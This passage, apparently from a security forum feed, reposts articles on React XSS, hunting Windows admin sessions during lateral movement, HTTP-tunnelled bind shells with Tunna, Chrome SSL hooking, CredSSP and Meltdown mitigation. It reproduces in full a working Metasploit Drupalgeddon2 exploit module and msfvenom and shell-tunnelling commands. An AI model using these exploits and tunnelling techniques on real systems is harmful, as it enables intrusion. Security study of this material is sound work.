living room and in order to figure out if they belonged in your house you looked them up in a criminal offenders database. I prefer whitelist based solutions. I know who is supposed to be in my house. import React, { Component } from 'react' import ReactDOM from 'react-dom' const URL = require('url-parse') class SafeURL extends Component { isSafe(dangerousURL, text) { const url = URL(dangerousURL, {}) if (url.protocol === 'http:') return true if (url.protocol === 'https:') return true return false } render() { const dangerousURL = this.props.dangerousURL const safeURL = this.isSafe(dangerousURL) ? dangerousURL : null return <a href={safeURL}>{this.props.text}</a> } } ReactDOM.render( <SafeURL dangerousURL=" javascript: alert(1)" text="Click me!" />, document.getElementById('root') ) Sursa: https://medium.com/javascript-security/avoiding-xss-in-react-is-still-hard-d2b5c7ad9412
-
Red Team Arsenal Red Team Arsenal is a web/network security scanner which has the capability to scan all company's online facing assets and provide an holistic security view of any security anomalies. It's a closely linked collections of security engines to conduct/simulate attacks and monitor public facing assets for anomalies and leaks. It's an intelligent scanner detecting security anomalies in all layer 7 assets and gives a detailed report with integration support with nessus. As companies continue to expand their footprint on INTERNET via various acquisitions and geographical expansions, human driven security engineering is not scalable, hence, companies need feedback driven automated systems to stay put. Installation Supported Platforms RTA has been tested both on Ubuntu/Debian (apt-get based distros) and as well as Mac OS. It should ideally work with any linux based distributions with mongo and python installed (install required python libraries from install/py_dependencies manually). Prerequisites: There are a few packages which are necessary before proceeding with the installation: Git client: sudo apt-get install git Python 2.7, which is installed by default in most systems Python pip: sudo apt-get install python-pip MongoDB: Read the official installation guide to install it on your machine. Finally run python install/install.py There are also optional packages/tools you can install (highly recommended): Sursa: https://github.com/flipkart-incubator/RTA
-
“I Hunt Sys Admins” Published January 19, 2015 by harmj0y [Edit 8/13/15] – Here is how the old version 1.9 cmdlets in this post translate to PowerView 2.0: Get-NetGroups -> Get-NetGroup Get-UserProperties -> Get-UserProperty Invoke-UserFieldSearch -> Find-UserField Get-NetSessions -> Get-NetSession Invoke-StealthUserHunter -> Invoke-UserHunter -Stealth Invoke-UserProcessHunter -> Invoke-ProcessHunter -Username X Get-NetProcesses -> Get-NetProcess Get-UserLogonEvents -> Get-UserEvent Invoke-UserEventHunter -> Invoke-EventHunter [Note] This post is a companion to the Shmoocon ’15 Firetalks presentation I gave, also appropriately titled “I Hunt Sys Admins”. The slides are here and the video is up on Irongeek. Big thanks to Adrian, @grecs and all the other organizers, volunteers, and sponsors for putting on a cool event! [Edit] I gave an expanded version of my Shmoocon talk at BSides Austin 2015, the slides are up here. One of the most common problems we encounter on engagements is tracking down where specific users have logged in on a network. If you’re in the lateral spread phase of your assessment, this often means gaining some kind of desktop/local admin access and performing the Hunt -> pop box -> Mimikatz -> profit pattern. Other times you may have domain admin access, and want to demonstrate impact by doing something like owning the CEO’s desktop or email. Knowing what users log in to what boxes from where can also give you a better understanding of a network layout and implicit trust relationships. This post will cover various ways to hunt for target users on a Windows network. I’m taking the “assume compromise” perspective, meaning that I’m assuming you already have a foothold on a Windows domain machine. I’ll cover the existing prior art and tradecraft (that I know of) and then will show some of the efforts I’ve implemented with PowerView. I really like the concept of “Offense in Depth“- in short, it’s always good to have multiple options in case you hit a snag at some step in your attack chain. PowerShell is great, but you always need to have backups in case something goes wrong. Existing Tools and Tradecraft The Sysinternals tool psloggedon.exe has been around for several years. It “…determines who is logged on by scanning the keys under the HKEY_USERS key” as well as using the NetSessionEnum API call. Admins (and hackers) have used this official Microsoft tool for years. One note: some of its functionality requires admin privileges on the remote machine you’re enumerating. Another “old school” tool we’ve used in the past is netsess.exe, a part of the joeware utilities. It also takes advantage of the NetSessionEnum call, and doesn’t need administrative privileges on a remote host. Think of a “net session” that works on remote machines. PVEFindADUser.exe is a tool released by the awesome @corelanc0d3r in 2009. Corelanc0d3r talks about the project here. It can help you find AD users, including enumerating the last logged in user for a particular system. However, you do need to have admin access on machines you’re running it against. Rob Fuller (@mubix’s) netview.exe project is a tool we’ve used heavily since it’s release at Derbycon 2012. It’s a tool to “enumerate systems using WinAPI calls”. It utilizes NetSessionEnum to find sessions, NetShareEnum to find shares, and NetWkstaUserEnum to find logged on users. It can now also check share access, highlight high value users, and use a delay/jitter. You don’t need administrative privileges to get most of this information from a remote machine. Nmap‘s flexible scripting engine also gives us some options. If you have a valid domain account, or local account valid for several machines, you can use smb-enum-sessions.nse to get remote session information from a remote box. And you don’t need admin privileges! If you have access to a user’s internal email, you can also glean some interesting information from internal email headers. Search for any chains to/from target users, and check any headers for given email chains. The “X-Originating-IP” header is often present, and can let you trace where a user sent a given email from. Scott Sutherland (@_nullbind) wrote a post in 2012 highlighting a few other ways to hunt for domain admin processes. Check out techniques 3 and 4, where he details other ways to scan remote machines for specific process owners, as well as how to scan for NetBIOS information of interest using nbtscan. For remote tasklistings, you’ll need local administrator permissions on the targets you’re going after. We’ll return to this in the PowerShell section. And finally, Smbexec has a checkda module which will check systems for domain admin processes and/or logins. Veil-Pillage takes this a step further with its user_hunter and group_hunter modules, which can give you flexibility beyond just domain admins. For both Smbexec and Veil-Pillage, you will need admin rights on the remote hosts. Active Directory: It’s a Feature! Active Directory is an awesome source of information from both offensive and defensive perspectives. One of the biggest turning points in the evolution of my tradecraft was when I began to learn just how much information AD can give up. Various user fields in Active Directory can give you some great starting points to track down users. The homeDirectory property, which contains the path to a user’s auto-mounted home drive, can give you a good number of file servers. The profilePath property, which contains a user’s roaming profile, can also sometimes give you a few servers to check out as well. Try running something like netsess.exe or netview.exe against these remote servers. They key here is that you’re using AD information to identify servers that several users are likely connected to. And the best part is, you don’t need any elevated privileges to query this type of user information! Also, Scott wrote another cool post early in 2014 on using service principal names to find locations where domain admin accounts might be. In short, you can use Scott’s Get-SPN PowerShell script to enumerate all servers where domain admins are registered to run services. I highly recommend checking it out for some more information. This is also something that the prolific Carlos Perez talked about at at Derbycon 2014. Once you get domain admin, but still want to track down particular users, Windows event logs can be a great place to check as well. One of my colleagues (@sixdub) write a great post on offensive event parsing for the purposes of user hunting. We’ll return to this as well shortly. PowerShell PowerShell PowerShell Anyone who’s read this blog or seen me speak knows that I won’t shut up about PowerShell, Microsoft’s handy post-exploitation language. PowerShell has some awesome AD hooks and various ways to access the lower-level Windows API. @mattifestation has written about several ways to interact with the Windows API through PowerShell here, here, and here. His most recent release with PSReflect makes it super easy to play with this lower-level access. This is something I’ve written about before. PowerView is a PowerShell situational-awareness tool I’ve been working on for a while that includes a few functions that help you hunt for users. To find users to target, Get-NetGroups *wildcard* will return groups containing specific wildcard terms. Also, Get-UserProperties will extract all user property fields, and Invoke-UserFieldSearch will search particular user fields for wildcard terms. This can sometimes help you narrow down users to hunt for. For example, we’ve used these functions to find the Linux administrators group and its associated members, so we could then hunt them down and keylog their PuTTY/SSH sessions The Invoke-UserHunter function can help you hunt for specific users on the domain. It accepts a username, userlist, or domain group, and accepts a host list or queries the domain for available hosts. It then runs Get-NetSessions and Get-NetLoggedon against every server (using those NetSessionEnum and NetWkstaUserEnum API functions) and compares the results against the resulting target user set. Everything is flexible, letting you define who to hunt for where. Again, admin privileges are not needed. Invoke-StealthUserHunter can get you good coverage with less traffic. It issues one query to get all users in the domain, extracts all servers from user.HomeDirectories, and runs a Get-NetSessions against each resulting server. As you aren’t touching every single machine like with Invoke-UserHunter, this traffic will be more “stealthy”, but your machine coverage won’t be as complete. We like to use Invoke-StealthUserHunter as a default, falling back to its more noisy brother if we can’t find what we need. A recently added PowerView function is Invoke-UserProcessHunter. It utilizes the newly christened Get-NetProcesses cmdlet to enumerate the process/tasklists of remote machines, searching for target users. You will need admin access to the machines you’re enumerating. The last user hunting function in PowerView is the weaponized version of @sixdub‘s post described above. The Get-UserLogonEvents cmdlet will query a remote host for logon events (ID 4624). Invoke-UserEventHunter wraps this up into a method that queries all available domain controllers for logon events linked to a particular user. You will need domain admin access in order to query these events from a DC. If I missed any tools or approaches, please let me know! Sursa: http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
-
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'Drupalgeddon2', 'Description' => %q{ CVE-2018-7600 / SA-CORE-2018-002 Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. The module can load msf PHP arch payloads, using the php/base64 encoder. The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));' }, 'License' => MSF_LICENSE, 'Author' => [ 'Vitalii Rudnykh', # initial PoC 'Hans Topo', # further research and ruby port 'José Ignacio Rojo' # further research and msf module ], 'References' => [ ['SA-CORE', '2018-002'], ['CVE', '2018-7600'], ], 'DefaultOptions' => { 'encoder' => 'php/base64', 'payload' => 'php/meterpreter/reverse_tcp', }, 'Privileged' => false, 'Platform' => ['php'], 'Arch' => [ARCH_PHP], 'Targets' => [ ['User register form with exec', {}], ], 'DisclosureDate' => 'Apr 15 2018', 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']), ]) register_advanced_options( [ ]) end def uri_path normalize_uri(target_uri.path) end def exploit_user_register data = Rex::MIME::Message.new data.add_part("php -r '#{payload.encoded}'", nil, nil, 'form-data; name="mail[#markup]"') data.add_part('markup', nil, nil, 'form-data; name="mail[#type]"') data.add_part('user_register_form', nil, nil, 'form-data; name="form_id"') data.add_part('1', nil, nil, 'form-data; name="_drupal_ajax"') data.add_part('exec', nil, nil, 'form-data; name="mail[#post_render][]"') post_data = data.to_s # /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri_path}user/register", 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, 'vars_get' => { 'element_parents' => 'account/mail/#value', 'ajax_form' => '1', '_wrapper_format' => 'drupal_ajax', } }) end ## # Main ## def exploit case datastore['TARGET'] when 0 exploit_user_register else fail_with(Failure::BadConfig, "Invalid target selected.") end end end Sursa: https://www.exploit-db.com/exploits/44482/
-
Interactive bindshell over HTTP By Kevin April 18, 2018 Primitives needed Webshell on a webserver Intro What do you do when you have exploited this webserver and really want an interactive shell, but the network has zero open ports and the only way in is through http port 80 on the webserver you’ve exploited? The answer is simple. Tunnel your traffic inside HTTP using the existing webserver. We previously have had this issue and had some messy solutions and sometimes just an open port by luck. Therefore we wanted a more generic approach that could be reused everytime we have a webshell. We started writing our tool called webtunfwd which did what we wanted. It listened on a local port on our attacking machine and then when we connected to the local port, it would then post whatever was inside socket.recv to a webserver with a POST request. The webserver would then take whatever was sent inside this POST request and feed it into the socket connection on the victim. Note: The diagram below is taken from the Tunna project’s github So this is a little walkthrough on what happens: Attacker uploads webtunfwd.php to victim which is now placed on victim:80/webtunfwd.php Attacker uploads his malware and/or a meterpreter bindshell which listens on localhost:20000 Victim is now listening on localhost:20000 Attacker calls webtunfwd.php?broker which connects to localhost:20000 and keeps the connection open. webtunfwd.php?broker reads from socket and writes it to a tempfile we’ll call out.tmp webtunfwd.php?broker reads from a tempfile we’ll call in.tmp and writes it to the socket Great. Now we have webtunfwd.php?broker which handles the socket connection on the victim side and keeps it open forever. We now need to write and read from the two files in.tmp and out.tmp respectively, down to our attacking machine. This is handeled by our python script local.py Attacker runs local.py on his machine which listens on the port localhost:11337 Attacker now connects with the meterpreter client to localhost:11337 When local.py recieves the connection it creates 2 threads. One for read and one for write The read thread reads from socket and writes to in.tmp by creating a POST request with the data to webtunfwd.php?write The write thread reads from out.tmp by creating a GET request to webtunfwd.php?read and writes to the socket So with this code we now have a dynamic port forwarding through HTTP and we can run whatever payload on the server we want. But after writing this tool we searched google a little and found that a tool called Tunna was written for this exact purpose by a company called SECFORCE. So instead of reinventing the wheel by posting our own tool that didn’t get nearly as much love as the Tunna project did we’re going to show how Tunna is used in action with a bind shell. Systems setup Victim -> Windows 2012 server Attacker -> Some Linux Distro Prerequisites Ability to upload a shell to a webserver Setting up Tunna The first thing we need to do in order to setup Tunna is to clone the git repository. On the attacking machine run: git clone https://github.com/SECFORCE/Tunna In this project we have quite some files. The ones we are going to use are proxy.py and then the contents of webshells In order for Tunna to work we are first going to upload the webshell that will handle the proxy connection/port forwarding to the victim machine In the webshells folder you’ll find conn.aspx - Use whatever method or vulnerability you are exploiting to get it onto the machine. As for now we’re going to assume that the shell conn.aspx is placed on http://victim.com/conn.aspx Tunna is now setup and ready to use Generating a payload We’re now going to generate our backdoor which is a simple shell via metasploit. The shell is going to listen on localhost:12000 which could be any port on localhost as we’ll connect to it through Tunna As we want to run our shell on a windows server running ASPX, we are going to build our backdoor in ASPX format with the use of MSFVENOM We use the following command: msfvenom --platform Windows -a x64 -p windows/x64/shell/bind_tcp LPORT=12000 LHOST=127.0.0.1 -f aspx --out shell.aspx --platform Target platform -a Target architecture -p Payload to use LPORT what port to listen on, on target LHOST the IP of where we are listening -f the output format of the payload --out where to save the file After running this command we should now have shell.aspx In the same way that we uploaded conn.aspx we should upload shell.aspx. So now we assume that you have the following two files available: http://victim.com/conn.aspx http://victim.com/shell.aspx Launching the attack So everything is setup. Tunna is uploaded to the server and we have our backdoor ready. The first thing we’re going to do is go to http://victim.com/shell.aspx We can now see that our shell is listening on port 12000 on our attacking machine after running a netstat -na Now we go to our attacking machine. We need two things for connecting. The first is our proxy.py from Tunna, and the next is our metasploit console for connecting. First we forward the local port 10000 to port 12000 on the remote host with the following command: python proxy.py -u http://target.com/conn.aspx -l 10000 -r 12000 -v --no-socks -u - The target url with the path to the webshell uploaded -l - The local port to listen on, on the attacking machine -r - The remote port to connect to, on the victim machine -v - verbosity --no-socks - Do not create a socks proxy. Only port forwarding needed The output will look like the following when it awaits connections: The attacking machine now listens locally on port 10000 and we can connect to it through metasploit In order to do this we configure metasploit the following way: And after that is done we enter run. We should now get a shell: The Tunna status terminal will look like this: Conclusions A full TCP connection wrapped in HTTP in order to evade strict firewalls and the like. We could’ve exchanged our normal shell with anything we wanted to as Tunna simply forwards the port for us. Performance suggestions for projects like Tunna We’ve experienced with some performance upgrades to the tunna project. One thing that we did not like was the amount of HTTP GET/POST requests sent to and from the server. Our solution to this was to use Transfer-encoding: Chunked. This enabled us to open a GET request and recieve bytes whenever ready and then wait for the next read from the socket without ever closing the GET request. We researched many ways to do this over POST, towards the server but we could’nt seem to circumvent that web servers like apache had some internal buffering on chunks retrieved, that was set to 8192 bytes Sursa: http://blog.secu.dk/blog/Tunnels_in_a_hard_filtered_network/
-
Are nightmares of data breaches and targeted attacks keeping your CISO up at night? You know you should be hunting for these threats, but where do you start? Told in the style of the popular children's story spoof, this soothing bedtime tale will lead Li'l Threat Hunters through the first five hunts they should do to find bad guys and, ultimately, help their CISOs "Go the F*#k to Sleep." By David Bianco & Robert Lee Full Abstract & Presentation Materials: https://www.blackhat.com/us-17/briefi...
-
- 2
-
-
Hooking Chrome’s SSL functions ON 26 FEBRUARY 2018 BY NYTROSECURITY The purpose of NetRipper is to capture functions that encrypt or decrypt data and send them through the network. This can be easily achieved for applications such as Firefox, where it is enough to find two DLL exported functions: PR_Read and PR_Write, but it is way more difficult for Google Chrome, where the SSL_Read and SSL_Write functions are not exported. The main problem for someone who wants to intercept such calls, is that we cannot easily find the functions inside the huge chrome.dll file. So we have to manually find them in the binary. But how can we do it? Chrome’s source code In order to achieve our goal, the best starting point might be Chrome’s source code. We can find it here: https://cs.chromium.org/ . It allows us to easily search and navigate through the source code. Articol complet: https://nytrosecurity.com/2018/02/26/hooking-chromes-ssl-functions/
- 1 reply
-
- 2
-
-
-
Nginx 1.13.10 Accept-Encoding Line Feed Injection Exploit
Nytro replied to KRONZY.'s topic in Exploituri
1. Stack based buffer overflow 2. Care e rezultatul acestui exploit? -
NetRipper - Smart traffic sniffing for penetration testers
Nytro replied to em's topic in Anunturi importante
https://nytrosecurity.com/2018/03/31/netripper-at-blackhat-asia-arsenal-2018/ -
From Public Key to Exploitation: Exploiting the Authentication in MS-RDP [CVE-2018-0886] In March 2013 Patch Tuesday, Microsoft released a patch for CVE-2018-0886, a critical vulnerability that was discovered by Preempt. This vulnerability can be classified as a logical remote code execution (RCE) vulnerability. The vulnerability consists of a design flaw in CredSSP, which is a Security Support Provider involved in the Microsoft Remote Desktop and Windows Remote Management (Including Powershell sessions). An attacker with complete Man in the Middle (MITM) control over such a session can abuse it to run an arbitrary code on the target server on behalf of the user! This vulnerability affects all windows versions. Download this white paper to learn: How Preempt Researchers found the vulnerability How we were able to exploit authentication in MS-RDP What you need to do to protect your organization Download now. Sursa: https://www.preempt.com/white-paper/from-public-key-to-exploitation-exploiting-the-authentication-in-ms-rdp-cve-2018-0886/
-
- 1
-
-
KVA Shadow: Mitigating Meltdown on Windows swiat March 23, 2018 On January 3rd, 2018, Microsoft released an advisory and security updates that relate to a new class of discovered hardware vulnerabilities, termed speculative execution side channels, that affect the design methodology and implementation decisions behind many modern microprocessors. This post dives into the technical details of Kernel Virtual Address (KVA) Shadow which is the Windows kernel mitigation for one specific speculative execution side channel: the rogue data cache load vulnerability (CVE-2017-5754, also known as “Meltdown” or “Variant 3”). KVA Shadow is one of the mitigations that is in scope for Microsoft's recently announced Speculative Execution Side Channel bounty program. It’s important to note that there are several different types of issues that fall under the category of speculative execution side channels, and that different mitigations are required for each type of issue. Additional information about the mitigations that Microsoft has developed for other speculative execution side channel vulnerabilities (“Spectre”), as well as additional background information on this class of issue, can be found here. Please note that the information in this post is current as of the date of this post. Vulnerability description & background The rogue data cache load hardware vulnerability relates to how certain processors handle permission checks for virtual memory. Processors commonly implement a mechanism to mark virtual memory pages as owned by the kernel (sometimes termed supervisor), or as owned by user mode. While executing in user mode, the processor prevents accesses to privileged kernel data structures by way of raising a fault (or exception) when an attempt is made to access a privileged, kernel-owned page. This protection of kernel-owned pages from direct user mode access is a key component of privilege separation between kernel and user mode code. Certain processors capable of speculative out-of-order execution, including many currently in-market processors from Intel, and some ARM-based processors, are susceptible to a speculative side channel that is exposed when an access to a page incurs a permission fault. On these processors, an instruction that performs an access to memory that incurs a permission fault will not update the architecturalstate of the machine. However, these processors may, under certain circumstances, still permit a faulting internal memory load µop (micro-operation) to forward the result of the load to subsequent, dependent µops. These processors can be said to defer handling of permission faults to instruction retirement time. Out of order processors are obligated to “roll back” the architecturally-visible effects of speculative execution down paths that are proven to have never been reachable during in-program-order execution, and as such, any µops that consume the result of a faulting load are ultimately cancelled and rolled back by the processor once the faulting load instruction retires. However, these dependent µops may still have issued subsequent cache loads based on the (faulting) privileged memory load, or otherwise may have left additional traces of their execution in the processor’s caches. This creates a speculative side channel: the remnants of cancelled, speculative µops that operated on the data returned by a load incurring a permission fault may be detectable through disturbances to the processor cache, and this may enable an attacker to infer the contents of privileged kernel memory that they would not otherwise have access to. In effect, this enables an unprivileged user mode process to disclose the contents of privileged kernel mode memory. Operating system implications Most operating systems, including Windows, rely on per-page user/kernel ownership permissions as a cornerstone of enforcing privilege separation between kernel mode and user mode. A speculative side channel that enables unprivileged user mode code to infer the contents of privileged kernel memory is problematic given that sensitive information may exist in the kernel’s address space. Mitigating this vulnerability on affected, in-market hardware is especially challenging, as user/kernel ownership page permissions must be assumed to no longer prevent the disclosure (i.e., reading) of kernel memory contents from user mode. Thus, on vulnerable processors, the rogue data cache load vulnerability impacts the primary tool that modern operating system kernels use to protect themselves from privileged kernel memory disclosure by untrusted user mode applications. In order to protect kernel memory contents from disclosure on affected processors, it is thus necessary to go back to the drawing board with how the kernel isolates its memory contents from user mode. With the user/kernel ownership permission no longer effectively safeguarding against memory reads, the only other broadly-available mechanism to prevent disclosure of privileged kernel memory contents is to entirely remove all privileged kernel memory from the processor’s virtual address space while executing user mode code. This, however, is problematic, in that applications frequently make system service calls to request that the kernel perform operations on their behalf (such as opening or reading a file on disk). These system service calls, as well as other critical kernel functions such as interrupt processing, can only be performed if their requisite, privileged code and data are mapped in to the processor’s address space. This presents a conundrum: in order to meet the security requirements of kernel privilege separation from user mode, no privileged kernel memory may be mapped into the processor’s address space, and yet in order to reasonably handle any system service call requests from user mode applications to the kernel, this same privileged kernel memory must be quickly accessible for the kernel itself to function. The solution to this quandary is to, on transitions between kernel mode and user mode, also switch the processor’s address space between a kernel address space (which maps the entire user and kernel address space), and a shadow user address space (which maps the entire user memory contents of a process, but only a minimal subset of kernel mode transition code and data pages needed to switch into and out of the kernel address space). The select set of privileged kernel code and data transition pages handling the details of these address space switches, which are “shadowed” into the user address space are “safe” in that they do not contain any privileged data that would be harmful to the system if disclosed to an untrusted user mode application. In the Windows kernel, the usage of this disjoint set of shadow address spaces for user and kernel modes is called “kernel virtual address shadowing”, or KVA shadow, for short. In order to support this concept, each process may now have up to two address spaces: the kernel address space and the user address space. As there is no virtual memory mapping for other, potentially sensitive privileged kernel data when untrusted user mode code executes, the rogue data cache load speculative side channel is completely mitigated. This approach is not, however, without substantial complexity and performance implications, as will later be discussed. On a historical note, some operating systems previously have implemented similar mechanisms for a variety of different and unrelated reasons: For example, in 2003 (prior to the common introduction of 64-bit processors in most broadly-available consumer hardware), with the intention of addressing larger amounts of virtual memory on 32-bit systems, optional support was added to the 32-bit x86 Linux kernel in order to provide a 4GB virtual address space to user mode, and a separate 4GB address space to the kernel, requiring address space switches on each user/kernel transition. More recently, a similar approach, termed KAISER, has been advocated to mitigate information leakage about the kernel virtual address space layout due to processor side channels. This is distinct from the rogue data cache load speculative side channel issue, in that no kernel memory contents, as opposed to address space layout information, were at the time considered to be at risk prior to the discovery of speculative side channels. KVA shadow implementation in the Windows kernel While the design requirements of KVA shadow may seem relatively innocuous, (privileged kernel-mode memory must not be mapped in to the address space when untrusted user mode code runs) the implications of these requirements are far-reaching throughout Windows kernel architecture. This touches a substantial number of core facilities for the kernel, such as memory management, trap and exception dispatching, and more. The situation is further complicated by a requirement that the same kernel code and binaries must be able to run with and without KVA shadow enabled. Performance of the system in both configurations must be maximized, while simultaneously attempting to keep the scope of the changes required for KVA shadow as contained as possible. This maximizes maintainability of code in both KVA shadow and non-KVA-shadow configurations. This section focuses primarily on the implications of KVA shadow for the 64-bit x86 (x64) Windows kernel. Most considerations for KVA shadow on x64 also apply to 32-bit x86 kernels, though there are some divergences between the two architectures. This is due to ISA differences between 64-bit and 32-bit modes, particularly with trap and exception handling. Please note that the implementation details described in this section are subject to change without notice in the future. Drivers and applications must not take dependencies on any of the internal behaviors described below without first checking for updated documentation. The best way to understand the complexities involved with KVA shadow is to start with the underlying low-level interface in the kernel that handles the transitions between user mode and kernel mode. This interface, called the trap handling code, is responsible for fielding traps (or exceptions) that may occur from either kernel mode or user mode. It is also responsible for dispatching system service calls and hardware interrupts. There are several events that the trap handling code must handle, but the most relevant for KVA shadow are those called “kernel entry” and “kernel exit” events. These events, respectively, involve transitions from user mode into kernel mode, and from kernel mode into user mode. Trap handling and system service call dispatching overview and retrospective As a quick recap of how the Windows kernel dispatches traps and exceptions on x64 processors, traditionally, the kernel programs the current thread’s kernel stack pointer into the current processor’s TSS (task state segment), specifically into the KTSS64.Rsp0 field, which informs the processor which stack pointer (RSP) value to load up on a ring transition to ring 0 (kernel mode) code. This field is traditionally updated by the kernel on context switch, and several other related internal events; when a switch to a different thread occurs, the processor KTSS64.Rsp0 field is updated to point to the base of the new thread’s kernel stack, such that any kernel entry event that occurs while that thread is running enters the kernel already on that thread’s stack. The exception to this rule is that of system service calls, which typically enter the kernel with a “syscall” instruction; this instruction does not switch the stack pointer and it is the responsibility of the operating system trap handling code to manually load up an appropriate kernel stack pointer. On typical kernel entry, the hardware has already pushed what is termed a “machine frame” (internally, MACHINE_FRAME) on the kernel stack; this is the processor-defined data structure that the IRETQ instruction consumes and removes from the stack to effect an interrupt-return, and includes details such as the return address, code segment, stack pointer, stack segment, and processor flags on the calling application. The trap handling code in the Windows kernel builds a structure called a trap frame (internally, KTRAP_FRAME) that begins with the hardware-pushed MACHINE_FRAME, and then contains a variety of software-pushed fields that describe the volatile register state of the context that was interrupted. System calls, as noted above, are an exception to this rule, and must manually build the entire KTRAP_FRAME, including the MACHINE_FRAME, after effecting a stack switch to an appropriate kernel stack for the current thread. KVA shadow trap and system service call dispatching design considerations With a basic understanding of how traps are handled without KVA shadow, let’s dive into the details of the KVA shadow-specific considerations of trap handling in the kernel. When designing KVA shadow, several design considerations applied for trap handling when KVA shadow were active, namely, that the security requirements were met, that performance impact on the system was minimized, and that changes to the trap handling code were kept as compartmentalized as possible in order to simplify code and improve maintainability. For example, it is desirable to share as much trap handling code between the KVA shadow and non-KVA shadow configurations as practical, so that it is easier to make changes to the kernel’s trap handling facilities in the future. When KVA shadowing is active, user mode code typically runs with the user mode address space selected. It is the responsibility of the trap handling code to switch to the kernel address space on kernel entry, and to switch back to the user address space on kernel exit. However, additional details apply: it is not sufficient to simply switch address spaces, because the only transition kernel pages that can be permitted to exist (or be “shadowed into”) in the user address space are only those that hold contents that are “safe” to disclose to user mode. The first complication that KVA shadow encounters is that it would be inappropriate to shadow the kernel stack pages for each thread into the user mode address space, as this would allow potentially sensitive, privileged kernel memory contents on kernel thread stacks to be leaked via the rogue data cache load speculative side channel. It is also desirable to keep the set of code and data structures that are shadowed into the user mode address space to a minimum, and if possible, to only shadow permanent fixtures in the address space (such as portions of the kernel image itself, and critical per-processor data structures such as the GDT (Global Descriptor Table), IDT (Interrupt Descriptor Table), and TSS. This simplifies memory management, as handling setup and teardown of new mappings that are shadowed into user mode address spaces has associated complexities, as would enabling any shadowed mappings to become pageable. For these reasons, it was clear that it would not be acceptable for the kernel’s trap handling code to continue to use the per-kernel-thread stack for kernel entry and kernel exit events. Instead, a new approach would be required. The solution that was implemented for KVA shadow was to switch to a mode of operation wherein a small set of per-processor stacks (internally called KTRANSITION_STACKs) are the only stacks that are shadowed into the user mode address space. Eight of these stacks exist for each processor, the first of which represents the stack used for “normal” kernel entry events, such as exceptions, page faults, and most hardware interrupts, and the remaining seven transition stacks represent the stacks used for traps that are dispatched using the x64-defined IST (Interrupt Stack Table) mechanism (note that Windows does not use all 7 possible IST stacks presently). When KVA shadow is active, then, the KTSS64.Rsp0 field of each processor points to the first transition stack of each processor, and each of the KTSS64.Ist[n] fields point to the n-th KTRANSITION_STACK for that processor. For convenience, the transition stacks are located in a contiguous region of memory, internally termed the KPROCESSOR_DESCRIPTOR_AREA, that also contains the per-processor GDT, IDT, and TSS, all of which are required to be shadowed into the user mode address space for the processor itself to be able to handle ring transitions properly. This contiguous memory block is, itself, shadowed in its entirety. This configuration ensures that when a kernel entry event is fielded while KVA shadow is active, that the current stack is both shadowed into the user mode address space, and does not contain sensitive memory contents that would be risky to disclose to user mode. However, in order to maintain these properties, the trap dispatch code must be careful to push no sensitive information onto any transition stack at any time. This necessitates the first several rules for KVA shadow in order to avoid any other memory contents from being stored onto the transition stacks: when executing on a transition stack, the kernel must be fielding a kernel entry or kernel exit event, interrupts must be disabled and must remain disabled throughout, and the code executing on a transition stack must be careful to never incur any other type of kernel trap. This also implies that the KVA shadow trap dispatch code can assume that traps arising in kernel mode already are executing with the correct CR3, and on the correct kernel stack (except for some special considerations for IST-delivered traps, as discussed below). Fielding a trap with KVA shadow active Based on the above design decisions, there is an additional set of tasks specific to KVA shadowing that must occur prior to the normal trap handling code in the kernel being invoked for a kernel entry trap events. In addition, there is a similar set of tasks related to KVA shadow that must occur at the end of trap processing, if a kernel exit is occurring. On normal kernel entry, the following sequence of events must occur: The kernel GS base value must be loaded. This enables the remaining trap code to access per-processor data structures, such as those that hold the kernel CR3 value for the current processor. The processor’s address space must be switched to the kernel address space, so that all kernel code and data are accessible (i.e., the kernel CR3 value must be loaded). This necessitates that the kernel CR3 value must be stored in a location that is, itself, shadowed. For the purposes of KVA shadow, a single per-processor KPRCB page that contains only “safe” contents maintains a copy of the current processor’s kernel CR3 value for easy access to the KVA shadow trap dispatch code. Context switch between address spaces, and process attach/detach update the corresponding KPRCB fields with the new CR3 value on process address space changes. The machine frame previously pushed by hardware as a part of the ring transition from user mode to kernel mode must be copied from the current (transition) stack, to the per-kernel-thread stack for the current thread. The current stack must be switched to the per-kernel-thread stack. At this point, the “normal” trap handling code can largely proceed as usual, and without invasive modifications (save that the kernel GS base has already been loaded). Roughly speaking, the inverse sequence of events must occur on normal kernel exit; the machine frame at the top of the current kernel thread stack must be copied to the transition stack for the processor, the stacks must be switched, CR3 must be reloaded with the corresponding value for the user mode address space of the current process, the user mode GS base must be reloaded, and then control may be returned to user mode. System service call entry and exit through the SYSCALL/SYSRETQ instruction pair is handled slightly specially, in that the processor does not already push a machine frame, because the kernel logically does not have a current stack pointer until it explicitly loads one. In this case, no machine frame needs be copied on kernel entry and kernel exit, but the other basic steps must still be performed. Special care needs to be taken by the KVA shadow trap dispatch code for NMI, machine check, and double fault type trap events, because these events may interrupt even normally uninterruptable code. This means that they could even interrupt the normally uninterruptable KVA shadow trap dispatch code itself, during a kernel entry or kernel exit event. These types of traps are delivered using the IST mechanism onto their own distinct transition stacks, and the trap handling code must carefully handle the case of the GS base or CR3 value being in any state due to the indeterminate state of the machine at the time in which these events may occur, and must preserve the pre-existing GS base or CR3 values. At this point, the basics for how to enter and exit the kernel with KVA shadow are in place. However, it would be undesirable to inline the KVA shadow trap dispatch code into the standard trap entry and trap exit code paths, as the standard trap entry and trap exit code paths could be located anywhere in the kernel’s .text code section, and it is desirable to minimize the amount of code that needs be shadowed into the user address space. For this reason, the KVA shadow trap dispatch code is collected into a series of parallel entry points packed within their own code section within the kernel image, and either the standard set of trap entry points, or the KVA shadow trap entry points are installed into the IDT at system boot time, based on whether KVA shadow is in use at system boot. Similarly, the system service call entry points are also located in this special code section in the kernel image. Note that one implication of this design choice is that KVA shadow does not 